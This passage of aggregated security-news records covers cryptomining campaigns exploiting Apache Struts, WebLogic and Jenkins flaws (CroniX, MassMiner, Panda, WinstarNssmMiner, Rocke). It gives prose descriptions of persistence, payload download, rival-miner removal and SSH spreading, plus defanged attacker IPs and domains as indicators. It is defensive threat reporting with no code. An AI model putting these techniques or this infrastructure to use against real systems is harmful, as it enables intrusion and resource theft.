In all three cases, the scripts are used to connect to the C2 server and download the deployment bash script to restart the mining process; older versions of the scripts are then deleted off the system.\n\nCroniX is also a competitive malware, locating and deleting the binaries of any previously installed cryptominers so as to claim all of the CPU resources for itself, F5 found.\n\n\u201cFor some miners, the attacker decides to take a more careful approach and check each process name and process CPU usage, and then kill only those processes that utilize 60 percent or more of the CPU resources,\u201d F5 researchers said. \u201cThis is probably done to avoid killing legitimate processes as the names of these miners (crond, sshd and syslogs) typically relate to legitimate programs on a Linux system.\u201d\n\nComparing the modus operandi of the operation, F5 researchers believe the actor is the same group that was behind a previous campaign exploiting Jenkins servers via [CVE-2017-1000353](<https://devcentral.f5.com/articles/jenkins-unsafe-deserialization-vulnerability-cve-2017-1000353-30142>). That campaign was uncovered two months ago.\n\n\u201cThe malware deployment pattern\u2026similar deployed file names and the quite unique usage of the XHide process-faker made us believe that the threat actor behind the exploitation of this fresh Struts 2 vulnerability is the same one,\u201d researchers noted in the analysis.\n\nOne difference is that in the previous campaign, the threat actor used a Chinese Git website to host malicious files. 
Here, the attackers are using a dedicated web server hosted in the U.S., along with domain names designating the Pacific island of Palau (.pw) \u2013 believed registered by a Russian registrant.\n\nWhile cryptomining can be seen as less destructive than [wiper malware,](<https://threatpost.com/secrets-of-the-wiper-inside-the-worlds-most-destructive-malware/131836/>) [ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) or Equifax-like [mass data exfiltration](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) (all of which can be carried out using this flaw), Jeannie Warner, security manager at WhiteHat Security, noted that exploit development tends to be faster for more widely embedded flaws, highlighting the importance of patching this particular issue immediately.\n\n\u201cApache Struts is used by some of the world\u2019s largest companies,\u201d she said via email. \u201cThe more common the vulnerability, the more it helps attackers simplify their process\u2026and the easier it becomes for non-skilled hackers to compromise more websites. Methods to exploit this newest Struts vulnerability are already available online, so it is absolutely critical that all companies implement the patch immediately. There\u2019s no time to waste.\u201d\n\nMore attacks should be anticipated; in fact, while Linux machines seem to be the target for this particular CroniX effort, the F5 analysis uncovered an additional file lurking on the server that seems tailored to Microsoft\u2019s OS.\n\n\u201c[The file] at /win/checking-test.hta holds a Visual Basic script that calls a Microsoft Windows cmd to run a Powershell command on a targeted victim,\u201d researchers said. 
\u201cSo, it seems this threat actor is targeting Windows OS (not just Linux) using another operation hosted on the same server.\u201d\n", "cvss3": {}, "published": "2018-09-05T17:48:03", "type": "threatpost", "title": "Active Campaign Exploits Critical Apache Struts 2 Flaw in the Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-1000353", "CVE-2017-5638", "CVE-2018-11776"], "modified": "2018-09-05T17:48:03", "id": "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "href": "https://threatpost.com/active-campaign-exploits-critical-apache-struts-2-flaw-in-the-wild/137207/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-04-25T05:49:59", "description": "Though it falls squarely into the trend of cryptominers setting their sights on the Monero virtual currency, the MassMiner malware family is adding its own special somethin\u2019-somethin\u2019 to the mix. It targets Windows servers with a variety of recent and well-known exploits \u2013 all within a single executable.\n\nIn fact, MassMiner uses a veritable cornucopia of attacks: The [EternalBlue](<https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/>) National Security Agency hacking tool ([CVE-2017-0143](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>)), which it uses to install DoublePulsar and the Gh0st RAT backdoor to establish persistence; an exploit for the well-known Apache Struts flaw that led to the Equifax breach ([CVE-2017-5638](<http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html>)); and an exploit for Oracle\u2019s WebLogic Java application server ([CVE-2017-10271](<http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html>)). 
It also uses the SQLck tool to gain brute-force access to Microsoft SQL Servers, and it even incorporates a fork of MassScan, a legitimate tool that can scan the internet in under six minutes.\n\n\u201cIt surprised us how many different exploits and hacking tools it leverages,\u201d said AlienVault researchers Chris Doman and Fernando Martinez, who analyzed the code.\n\nThey added that the malware family comprises many different versions, but they all spread first within the local network of its initial host, before attempting to propagate across the wider internet.\n\nAs for the anatomy of the attack, compromised Microsoft SQL Servers are first subjected to scripts that install MassMiner and disable a number of important security features and anti-virus protections.\n\nOnce the malware has been installed, it sets about mining for Monero and hooking up with a crypto-wallet and mining pool; it also connects with its C2 server for updates, and configures itself to infect other machines on the network. Meanwhile, a short VisualBasic script is used to deploy the malware to compromised Apache Struts servers, and it moves laterally by replicating itself like a worm. MassScan meanwhile passes a list of both private and public IP ranges to scan during execution, to find fresh server targets out on the web that it can break into with the SQLck brute-force tool.\n\nSo far, the criminals behind the malware have been successful with this kitchen-sink approach: AlienVault in its [analysis](<https://www.alienvault.com/blogs/labs-research/massminer-malware-targeting-web-servers>) identified two Monero wallets belonging to the attackers.\n\nThe success is unsurprising, according to Ruchika Mishra, director of products and solutions at Balbix.\n\n\u201cGiven [the workforce skills shortage], it\u2019s not hard to imagine a multi-pronged attack such as MassMiner bypassing security systems and staying under the radar with relative ease,\u201d Mishra said via email. 
\u201cWith the proliferation of coin-mining attacks in 2017 and 2018, I foresee continued innovation and a significant uptick in complexity as the barrier to entry for attackers lowers and iterations of successful exploits become more readily available on the Dark Web.\u201d\n\nWorryingly, other capabilities in the bad code suggest that MassMiner may have loftier goals than simply cryptomining. On the EternalBlue front, it uses the exploit to drop the [DoublePulsar](<https://threatpost.com/nsas-doublepulsar-kernel-exploit-in-use-internet-wide/125165/>) Windows kernel attack, which is a sophisticated memory-based payload that hooks onto x86 and 64-bit systems and allows an attacker to execute any raw shellcode payload they wish, giving them full control over the system.\n\nMassMiner also uses EternalBlue to install [Gh0st RAT](<https://threatpost.com/eternalblue-exploit-spreading-gh0st-rat-nitol/126052/>), a trojan backdoor for persistence that has targeted the Windows platform for years. It was once primarily a nation-state tool used in APT espionage attacks against government agencies, activists and other political targets, until the EternalBlue exploit was used to spread it in other contexts last year.\n\nIncidentally, this is not the only cryptomining malware to make use of the ShadowBrokers\u2019 [release](<https://threatpost.com/shadowbrokers-remain-an-enigma/127072/>) of a trove of NSA exploits. Last week, [a malware called PyRoMine](<https://threatpost.com/pyromine-uses-nsa-exploit-for-monero-mining-and-backdoors/131472/>) that uses the EternalRomance tool was found in the wild mining Monero. 
Like MassMiner, it has far-ranging and concerning capabilities: It sets up a hidden default account on the victimized machine with system administrator privileges, which can be used for re-infection and further attacks.\n\nThe multi-pronged approach may be unusual, but it showcases the increasingly complex task that businesses have in front of them when it comes to their security postures.\n\n\u201cThe enterprise attack surface is hyper-dimensional and constantly increasing with hundreds of attack vectors. Enterprises continue to struggle with not just mapping their attack surfaces, but also identifying which systems are easiest to attack and can be used as a launch point for a breach,\u201d said Mishra.\n", "cvss3": {}, "published": "2018-05-03T20:26:37", "type": "threatpost", "title": "MassMiner Takes a Kitchen-Sink Approach to Cryptomining", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0143", "CVE-2017-10271", "CVE-2017-5638"], "modified": "2018-05-03T20:26:37", "id": "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "href": "https://threatpost.com/massminer-takes-a-kitchen-sink-approach-to-cryptomining/131687/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-05-13T21:58:43", "description": "The Panda threat group, best known for launching the widespread and successful 2018 [\u201cMassMiner\u201d cryptomining malware](<https://threatpost.com/massminer-takes-a-kitchen-sink-approach-to-cryptomining/131687/>) campaign, has continued to use malware to mine cryptocurrency in more recent attacks. A fresh analysis of the group reveals Panda has adopted a newly-updated infrastructure, payloads and targeting.\n\nWhile considered unsophisticated, researchers warn that the threat group has a wide reach and has attacked organizations in banking, healthcare, transportation and IT services. 
So far, researchers estimate that Panda has made away with more than $100,000 in Monero \u2013 and with attacks as recently as August 2019, the threat group isn\u2019t ceasing its activities anytime soon, they said.\n\n\u201cPanda\u2019s willingness to persistently exploit vulnerable web applications worldwide, their tools allowing them to traverse throughout networks, and their use of RATs, means that organizations worldwide are at risk of having their system resources misused for mining purposes or worse, such as exfiltration of valuable information,\u201d said Christopher Evans and David Liebenberg with [Cisco\u2019s Talos research team.](<https://blog.talosintelligence.com/2019/09/panda-evolution.html>)\n\nResearchers first became aware of Panda in the summer of 2018 after they engaged in a widespread illicit mining campaign called \u201c[MassMiner](<https://threatpost.com/massminer-takes-a-kitchen-sink-approach-to-cryptomining/131687/>).\u201d During that campaign, the threat actor used MassScan, a legitimate port scanner, to sniff out various vulnerabilities in servers to exploit, including a WebLogic vulnerability ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)) and a remote code execution vulnerability in Apache Struts 2 ([CVE-2017-5638](<https://nvd.nist.gov/vuln/detail/CVE-2017-5638>)).\n\nThe threat group then would exploit the flaws and install malware, which would set about mining for Monero and hooking up with a crypto-wallet and mining pool.\n\nSince then, in 2019, researchers said that the threat group has constantly evolved to update its infrastructure, exploits and payloads.\n\n\u201cShortly thereafter [the 2018 campaign], we linked Panda to another widespread illicit mining campaign with a different set of command and control (C2) servers,\u201d researchers said. 
\u201cWe believe Panda is a legitimate threat capable of spreading cryptocurrency miners that can use up valuable computing resources and slow down networks and systems.\u201d\n\nPanda has constantly changed the vulnerabilities that it targets over the past year. For instance, in January 2019, Talos researchers saw Panda exploiting a recently-disclosed vulnerability in the ThinkPHP web framework (CNVD-2018-24942). And in June 2019, Panda began to target a newer WebLogic vulnerability (CVE-2019-2725) and leverage an updated payload with new features to download a secondary miner payload.\n\nIn the most recent campaigns, including one which took place in August 2019, Panda began employing a different set of command-and-control (C2) servers as well as a new payload-hosting infrastructure.\n\nIn March 2019, for instance, researchers observed the actor leveraging new infrastructure, including various subdomains of the domain hognoob[.]se. And in August, researchers said they observed several attacker IPs, post-exploit, pulling down payloads from a newer URL and saving the file as \u201cBBBBB\u201d (a slight departure from previous behavior, when the file was saved under a random 20-character name). Panda would then execute the file via PowerShell.\n\nPanda has changed up its payload over the summer as well, so that its initial payload now uses the Certutil command-line utility \u2013 which can be used to obtain certificate authority information and configure Certificate Services \u2013 to download the secondary miner payload.\n\nThough the threat actor has swapped up its payloads, targeting and infrastructure, very little of its TTPs [tactics, techniques and procedures] are sophisticated, Cisco\u2019s Evans told Threatpost.\n\nFor instance, \u201cThey attempt to hide their miners using the exact same popular techniques we see with other groups,\u201d he told Threatpost. 
\u201cTheir infrastructure is predictable: I can usually peg a new Panda domain as soon as I see it in the data; they tend to just be iterations of each other. Their early infrastructure was registered using an email address that immediately allowed Dave to pivot into their social media in China. They attack the same honeypots day after day with the same payloads. They don\u2019t even bother to confirm their victims are running a vulnerable system before they deliver an exploit.\u201d\n\nBetween swapping up its tactics, domains and payloads, researchers said that Panda has now made more than $100,000 through illicit cryptomining \u2013 and moving forward, Panda remains an active threat that system administrators should be wary of.\n\n\u201cThere are several ways to detect mining activity but let\u2019s focus on the simple solutions of patching and basic security controls,\u201d Evans told Threatpost. 
\u201cIf you\u2019re running a web-accessible WebLogic server that hasn\u2019t been patched against vulnerabilities like CVE-2017-10271, it\u2019s likely they have at least targeted the system for exploitation if not actually dropped a miner on it\u2026 In addition, if you don\u2019t need it open to the Internet, take it off.\u201d\n", "cvss3": {}, "published": "2019-09-17T21:04:35", "type": "threatpost", "title": "Panda Threat Group Mines for Monero With Updated Payload, Targets", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2017-5638", "CVE-2019-2725"], "modified": "2019-09-17T21:04:35", "id": "THREATPOST:12E93CDF8BAC1B158CE1737E859FDD80", "href": "https://threatpost.com/panda-threat-group-mines-for-monero-with-updated-payload-targets/148419/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-04-25T05:49:50", "description": "Hackers behind cryptominer attacks are growing more aggressive and ruthless. Case in point, a cryptominer malware sample dubbed WinstarNssmMiner has been tracked in 500,000 attacks in the past three days, earning the crooks $28,000, according to researchers.\n\nWhat makes the cryptominer so vicious is the fact that, post infection, if a victim\u2019s AV software identifies WinstarNssmMiner and tries to remove it (or a user tries to disable it) the malware crashes the host system. WinstarNssmMiner targets Windows systems and leeches on to a system\u2019s processor power with a trojanized version of the XMRig mining program.\n\n\u201cThis malware is very hard to remove since victims\u2019 computers crash as soon as [it\u2019s] found,\u201d according to 360 Security researchers who published a [report on the malware Wednesday](<https://blog.360totalsecurity.com/en/cryptominer-winstarnssmminer-made-fortune-brutally-hijacking-computer/>). 
\u201cWe\u2019re quite surprised to see a cryptominer being so brutal to hijack victims\u2019 computers by adopting techniques of stubborn malware,\u201d researchers wrote.\n\nAn analysis of the cryptominer campaign reveals WinstarNssmMiner has already earned cybercriminals 133 Monero, or $28,000 based on current rates. 
Researchers did not specify how long it took criminals to earn that money.\n\nThose totals are a drop in the bucket for crypto-jacking campaigns. Malicious cryptomining that targets computers, servers or cloud-based systems have seen enormous growth over the last six months earning crooks millions in cryptocurrency. In February, hackers are estimated to have earned $3 million by exploiting a vulnerability ([CVE-2017-1000353](<https://jenkins.io/security/advisory/2017-04-26/>)) on servers running Jenkins software and installing Monero miners, researchers at [Check Point reported](<https://research.checkpoint.com/jenkins-miner-one-biggest-mining-operations-ever-discovered/>).\n\nIt\u2019s unclear what the WinstarNssmMiner infection path is, but once the malware executes on a targeted system it launches a system process called svchost.exe, a process that manages system services. Next, it injects malicious code into svchost.exe.\n\n\u201cThere are actually two svchost.exe processes created. One performs the mining tasks. The other runs in the background for sensing the antivirus protection and avoiding detection,\u201d researchers said.\n\nThe svchost.exe process created for cryptomining has a process attribute of CriticalProcess, which means terminating the process crashes the system. A second svchost.exe process runs in the background and attempts to detect \u201cdecent\u201d antivirus software that developers know can identify the malware. \u201c[The] malware will quit automatically to avoid direct confrontation,\u201d researchers said.\n\nThe miner itself is based on the open source project, XMRig. XMRig is a legitimate cryptocurrency mining program known as a high performance Monero CPU miner. The miner is better known for its trojanized versions that have been adopted for criminal use. 
It has been used [in several recent malicious cryptocurrency campaigns](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>) and one in January where it was installed via malware on [15 to 30 million endpoints](<https://researchcenter.paloaltonetworks.com/2018/01/unit42-large-scale-monero-cryptocurrency-mining-operation-using-xmrig/>), according to a report by Palo Alto Networks.\n\nXMRig code was also used in recent attacks, such as the Jenkins miner, and also with malicious campaigns dubbed RubyMiner and WaterMiner, according to [an IBM X-Force Research report](<https://securityintelligence.com/xmrig-father-zeus-of-cryptocurrency-mining-malware/>).\n", "cvss3": {}, "published": "2018-05-16T19:56:09", "type": "threatpost", "title": "New Cryptominer Distributes XMRig in Aggressive Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-1000353"], "modified": "2018-05-16T19:56:09", "id": "THREATPOST:BE009076F7BB03DF3F38AEAC53E3DE88", "href": "https://threatpost.com/new-cryptominer-distributes-xmrig-in-aggressive-attacks/132027/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "talosblog": [{"lastseen": "2018-08-31T19:09:28", "description": "_This post was authored by [David Liebenberg](<https://twitter.com/chinahanddave>). _\n\n \n \n\n\n## Summary\n\n \nCryptocurrency miners are becoming an increasingly significant part of the threat landscape. These malicious miners steal CPU cycles from compromised devices to mine cryptocurrencies and bring in income for the threat actor. \n \nIn this post, we look at the activity of one particular threat actor: Rocke. We will examine several of Rocke's campaigns, malware, and infrastructure while uncovering more information about the actor. After months of research, we believe that Rocke is an actor that must be followed, as they continue to add new features to their malware and are actively exploring new attack vectors. 
\n \n\n\n## Introduction\n\n \nTalos has written widely about the issue of [cryptomining malware](<https://blog.talosintelligence.com/2018/01/malicious-xmr-mining.html&sa=D&ust=1535643040325000>) and how organizations should [protect systems](<https://blog.talosintelligence.com/2018/07/blocking-cryptomining.html&sa=D&ust=1535643040326000>) against this threat. We continue to actively research developments in this threat through research that includes monitoring criminal forums and deploying honeypot systems to attract these threats. It is through these intelligence sources that the Chinese-speaking actor which we refer to as \"Rocke\" came to our attention. \n \nRocke actively engages in distributing and executing cryptomining malware using a varied toolkit that includes Git repositories, HttpFileServers (HFS), and a myriad of different payloads, including shell scripts, JavaScript backdoors, as well as ELF and PE miners. \n \n\n\n## Early campaigns\n\n \nThis threat actor initially came to our attention in April 2018, leveraging both Western and Chinese Git repositories to deliver malware to honeypot systems vulnerable to an Apache Struts vulnerability. \n \nSeveral files were downloaded to our Struts2 honeypot from the Chinese repository site gitee.com for a user named \"c-999.\" Subsequently, the Gitee user page transitioned to \"c-888.\" Around the same time, we observed similar activity pulling down files from a gitlab.com repository page for a user named \"c-18.\" \n \nThe repositories on both Gitee and GitLab were identical. All the repositories had a folder called \"ss\" that contained 16 files. The files were a collection of ELF executables, shell scripts, and text files that execute a variety of actions, including achieving persistence and the execution of an illicit cryptocurrency miner. 
\n \nOnce the threat actor had compromised a system, they achieved persistence on the device by installing a cron job that downloads and executes a file \"logo.jpg\" from \"3389[.]space.\" This file is a shell script which, in turn, downloads mining executables from the threat actor's Git repositories and saves them under the filename \"java.\" The exact file downloaded depends on the victim's system architecture. Similarly, the system architecture determines if \"h32\" or \"h64\" is used to invoke \"java.\" \n \nAlthough we first observed this actor exploiting vulnerabilities in Apache Struts, we've also observed what we believe to be the same individual exploiting an Oracle WebLogic server vulnerability (CVE-2017-10271), and also exploiting CVE-2017-3066, a critical Java deserialization vulnerability in the Adobe ColdFusion platform. \n \n\n\n## Recent campaign\n\n \nIn late July, we became aware that the same actor was engaged in another similar campaign. Through our investigation into this new campaign, we were able to uncover more details about the actor. \n \nWe observed a wget request from our Struts2 honeypot for a file named \"0720.bin\" located on 118[.]24[.]150[.]172:10555. We visited this IP and found it was an open HFS hosting \"0720.bin\" along with 10 additional files: \"3307.bin,\" \"a7,\" \"bashf,\" \"bashg,\" \"config.json,\" \"lowerv2.sh,\" \"pools.txt,\" \"r88.sh,\" \"rootv2.sh\" and \"TermsHost.exe.\" We set about examining these files. \n \n \n[](<https://3.bp.blogspot.com/-Wv1QkpgsIM0/W4gFUMGqKFI/AAAAAAAAAx4/evI36ADu_wE3nWnR38WNm6I2gitFSIngwCLcBGAs/s1600/image5.png>) \n--- \nScreenshot of HFS system \n \n \n \n \nWe had previously observed this same IP scanning for TCP port 7001 throughout May 2018. This was potentially a scan for Oracle WebLogic servers, which listen on TCP port 7001 by default. 
\n \nBoth \"0720.bin\" and \"3307.bin\" are similar ELF files of similar size (84.19KB) that reach out to 118[.]24[.]150[.]172, and were marked clean in VirusTotal at the time of discovery. Morpheus Labs described a similar file that connects to the same IP address, which could open a shell on the victim's machine if a password-verified instruction was issued from the C2. In both our samples, as well as the ones that [Morpheus Labs](<https://morphuslabs.com/criminals-dont-read-instructions-or-use-strong-passwords-a09439617867&sa=D&ust=1535643040331000>) described, the hard-coded password was not only identical, but also located at the same offset. \n \n[](<https://3.bp.blogspot.com/-gkkEgex3fQE/W4gFfUPyS7I/AAAAAAAAAx8/FIip4n1BydgCUlwQQoEJKmNlfvJ3ShivQCLcBGAs/s1600/image3.png>) \n--- \nHard-coded password \n \n \n \n\"A7\" is a shell script that kills a variety of processes related to other cryptomining malware (including those with names matching popular mining malware such as \"cranberry,\" \"yam,\" or \"kworker\"), as well as mining in general (such as \"minerd\" and \"cryptonight\"). It detects and uninstalls various Chinese AV, and also downloads and extracts a tar.gz file from blog[.]sydwzl[.]cn, which also resolves to 118[.]24[.]150[.]172. The script downloads a file from GitHub called [\"libprocesshider,\"](<https://github.com/gianlucaborello/libprocesshider&sa=D&ust=1535643040332000>) which hides a file called \"x7\" using the ID preloader. The script looks for IP addresses in known_hosts and attempts to SSH into them, before downloading \"a7\" again from the actor's HFS at 118[.]24[.]150[.]172, and execute it. \n \n[](<https://3.bp.blogspot.com/-kHdZB-4kmko/W4gF3DsxTGI/AAAAAAAAAyE/hYEz3KrdFgIkb7EvjWOa_-K-iwZvnGmzACLcBGAs/s1600/image4.png>) \n--- \nExtract of Source Code of \"a7\" \n \n \n \n \n\"Config.json\" is a mining config file for XMRig, an open-source Monero miner. 
The file sets the mining pool as xmr[.]pool[.]MinerGate[.]com:45700 and the actor's wallet as rocke@live.cn. This is why we have named the actor \"Rocke\" (note that for MinerGate, an email can be used in place of a Monero wallet number \u2014 it's simply the login email for the MinerGate platform). \"Pools.txt\" appears to be a config file for XMR-stak, an open-source universal Stratum pool miner that mines Monero, Aeon and more. This configuration file contains the same actor pool and wallet information as the first. \n \n\"Bashf\" is a variant of XMR-stak while \"bashg\" is a variant of XMRig. \n \n \n \n\"Lowerv2.sh\" and \"rootv2.sh\" are similar shell scripts that attempt to download and execute the mining malware components \"bashf\" and \"bashg,\" hosted on 118[.]24[.]150[.]172. If the shell scripts do not download a miner from 118[.]24[.]150[.]172, they attempt to download a file called \"XbashY\" from 3g2upl4pq6kufc4m[.]tk. \n \n\"R88.sh\" is a shell script that installs a cron job and attempts to download \"lowerv2.sh\" or \"rootv2.sh.\" \n \n\"TermsHost.exe\" is a PE32 Monero miner. Based on the config file it uses, it appears to be the [Monero Silent Miner](<https://xmrminer.net/faq.php&sa=D&ust=1535643040335000>). This miner can be purchased online for $14 and targets malicious actors. Advertising for the miner promotes it as offering startup registry key persistence, mining only while idle, and the ability to inject the miner into \"Windows processes to bypass firewalls.\" The sample grabs the config file \"xmr.txt,\" which contains the same configuration information as the previous files, from Rocke's command and control (C2) server hosted on sydwzl[.]cn. The sample then injects code into notepad.exe, which then proceeds to communicate with the MinerGate pool. The sample also creates the UPX-packed file \"dDNLQrsBUE.url\" in the Windows Start Menu Folder. 
Intriguingly, this file appears to share some similarities with Cobalt Strike, the popular penetration testing software, which would allow the attacker to have greater control over the infected system. \n \nThe payload appears to be similar to one used by the Iron Cybercrime Group, as [reported](<https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/>) by cybersecurity firm Intezer in May. Both Iron and Rocke's malware behave similarly, and reach out to similar infrastructure. So, while we can assess with high confidence that the payloads share some code base, we are still unsure of the exact relationship between Rocke and Iron Cybercrime Group. \n \n\n\n## The actor\n\n \nThrough Rocke's MinerGate Monero wallet email [rocke@live.cn](<mailto:rocke@live.cn>), we were able to uncover additional information about the actor. We noticed that Rocke's C2 was registered to the address jxci@vip.qq.com. We then found a [leak](<http://www.moonsec.com/post-467.html&sa=D&ust=1535643040337000>) of user information from the Chinese security site FreeBuf that showed that a user named \"rocke\" was associated with the email [jxci@vip.qq.com](<mailto:jxci@vip.qq.com>). This suggested that they were one and the same. [4] \n \nRocke has been observed seeking access to cloud storage services, as well as obtaining manuals for programming in the Chinese Easy language. \n \nThe majority of websites registered to Rocke list Jiangxi Province addresses for their registration. Some of these websites were for Jiangxi-based businesses, such as belesu[.]com, which sells baby food. We had additional indications that Rocke is from Jiangxi based on their GitHub (see below). It is possible that the \"jx\" in jxci@vip.qq.com stands for Jiangxi. Therefore, we assess with high confidence that Rocke operates from Jiangxi Province. \n \n\n\n### The GitHub\n\n \nWe identified a [GitHub page](<https://github.com/rocke&sa=D&ust=1535643040338000>) apparently associated with Rocke. 
The GitHub page lists Rocke as being affiliated with Jiangxi Normal University. In one [repository folder](<https://github.com/rocke/rocke.github.io/tree/master/sample&sa=D&ust=1535643040339000>), we found several of the same files which were found on the HFS system, including several of the shell scripts with their wallet information included, as well as variants of the miner. \n \n\n\n[](<https://2.bp.blogspot.com/-SNtJa5UiPK4/W4gGCqRKeUI/AAAAAAAAAyI/5Q6jWCI6uS45BK8w0iehPGTNISfSnZIMQCLcBGAs/s1600/image2.png>)\n\n \n \nWe found additional repositories for the same account. Within these repositories, we found scripts similar to those found in previous campaigns, with the exception that they reached out to sydwzl[.]cn in addition to the previously observed domain 3389[.]space. These findings support the link between Rocke and the activity we previously observed in April and May. \n \nWe also found an [additional repository](<https://github.com/gosrs&sa=D&ust=1535643040339000>) through Rocke's page that's hosting nearly identical content, but with a different C2. However, we are unable to determine how that page is being used or who is using it. \n \nThe files within their various repositories show that Rocke has become interested in browser-based JavaScript mining through the tool CryptoNote, as well as browser-based exploitation through the Browser Exploitation Framework. It appears that they are relying on fake Google Chrome alerts, fake apps, and fake Adobe Flash updates to social engineer users into downloading malicious payloads. \n \n\n\n[](<https://3.bp.blogspot.com/-RfGQEzxzT8U/W4gGOJCNnWI/AAAAAAAAAyQ/9LUooe3vkT4oisVEs5G9zakzcxEqLdirQCLcBGAs/s1600/image6.png>)\n\n \n \n\n\n[](<https://4.bp.blogspot.com/--PZgS5QMD4c/W4gGVIWDJxI/AAAAAAAAAyY/5HcEvufCv5UrUxV5E-F9btlI7knaiWH1QCLcBGAs/s1600/image1.png>)\n\n \n \nOne of the JavaScript files in the repository, named \"command.js,\" uses hidden IFrames to deliver payloads hosted on CloudFront domains. 
The payload that we were able to obtain was UPX packed and behaved very similarly to the file \"dDNLQrsBUE.url\" dropped by \"TermsHost.exe.\" \n \nRocke has also shown interest in other security-related repositories. They have forked repositories with exploit information, including those related to Apache Struts 2, JBoss and Shadow Brokers, as well as more general-use tools such as masscan, proxy tools and brute forcers. \n \n\n\n## Conclusion\n\n \nBased on their activity in the past few months, Talos assesses with high confidence that Rocke will continue to leverage Git repositories to download and execute illicit mining onto victim machines. It is interesting to note that they are expanding their toolset to include browser-based miners, difficult-to-detect trojans, and the Cobalt Strike malware. Besides noisy scan-and-exploit activity, it appears that Rocke is likely also pursuing social engineering as a new infection vector, as demonstrated by the repositories involving fake Adobe Flash and Google Chrome updates. \n \nDespite the volatility in the value of various cryptocurrencies, the trend of illicit cryptocurrency mining activity among cybercriminals shows no signs of abating. Rocke's various campaigns show the variety of infection vectors, malware, and infrastructure that these criminals will employ to achieve their goals. 
\n \n\n\n## IOCs:\n\n \n \n\n\n### Earlier campaign:\n\n \n \n\n\n#### Attacking IPs targeting Struts:\n\n \n \n52[.]167[.]219[.]168: Attacking IP using repo at gitlab \n120[.]55[.]226[.]24: Attacking IP using repo at gitee \n \n\n\n#### Attacking IP targeting WebLogic:\n\n \n \n27[.]193[.]180[.]224 \n \n\n\n#### Attacking IPs targeting ColdFusion:\n\n \n \n112[.]226[.]250[.]77 \n27[.]210[.]170[.]197 \n112[.]226[.]74[.]162 \n \n\n\n#### Domains\n\n \n3389[.]space 
\n \n\n\n### More recent campaign:\n\n \n \n\n\n#### IPs\n\n \n123[.]249[.]9[.]149: Issues get request for 0720.bin \n118[.]24[.]150[.]172: Rocke's HFS, also resolves to C2 sydwzl[.]cn \n \n\n\n#### Domains:\n\n \nsydwzl[.]cn \nblockbitcoin[.]com: Reached out to by Install.exe \ndazqc4f140wtl[.]cloudfront[.]net: file server \n3g2upl4pq6kufc4m[.]tk: file server \nd3goboxon32grk2l[.]tk: file server \nenjoytopic[.]tk: file server \nrealtimenews[.]tk: file server \n8282[.]space: older C2 \n \n\n\n#### Domains registered to Rocke (not all are necessarily malicious):\n\n \n \n5-xun[.]com \n88180585[.]com \nfirstomato[.]com \njxtiewei[.]com \nncyypx[.]net 
\n \n \n", "cvss3": {}, "published": "2018-08-30T08:26:00", "type": "talosblog", "title": "Rocke: The Champion of Monero Miners", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2017-3066"], "modified": "2018-08-31T17:22:22", "id": "TALOSBLOG:7B703A19FAC4E490CFFB2AE43C1606DF", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/e2oaIaRaI6k/rocke-champion-of-monero-miners.html", "cvss": {"score": 7.5, 
"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-09-08T17:15:47", "description": "<i>This post authored by <a href=\"https://twitter.com/infosec_nick\">Nick Biasini</a> with contributions from <a href=\"https://twitter.com/nschmx\">Alex Chiu</a>.</i><br /><br />Earlier this week, a critical vulnerability in <a href=\"https://cwiki.apache.org/confluence/display/WW/S2-052\">Apache Struts</a> was publicly disclosed in a security advisory. This new vulnerability, identified as CVE-2017-9805, manifests due to the way the REST plugin uses XStreamHandler with an instance of XStream for deserialization without any type filtering. As a result, a remote, unauthenticated attacker could achieve remote code execution on a host running a vulnerable version of Apache Struts.<br /><br />This isn't the only vulnerability that has been recently identified in Apache Struts. <a href=\"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html\">Earlier this year</a>, Talos responded to a zero-day vulnerability that was under active exploitation in the wild. Talos has observed exploitation activity targeting CVE-2017-9805 in a way that is similar to how CVE-2017-5638 was exploited back in March 2017.<br /><br /><a name='more'></a><br /><h3 id=\"h.yjfcx7oxvccx\">Details</h3>Immediately after the reports surfaced related to this exploit, Talos began researching how it operated and began work to develop coverage to prevent successful exploitation. This was achieved and we immediately began seeing active exploitation in the wild. Thus far, exploitation appears to be primarily scanning activity, with outbound requests that appear to be identifying systems that are potentially vulnerable. 
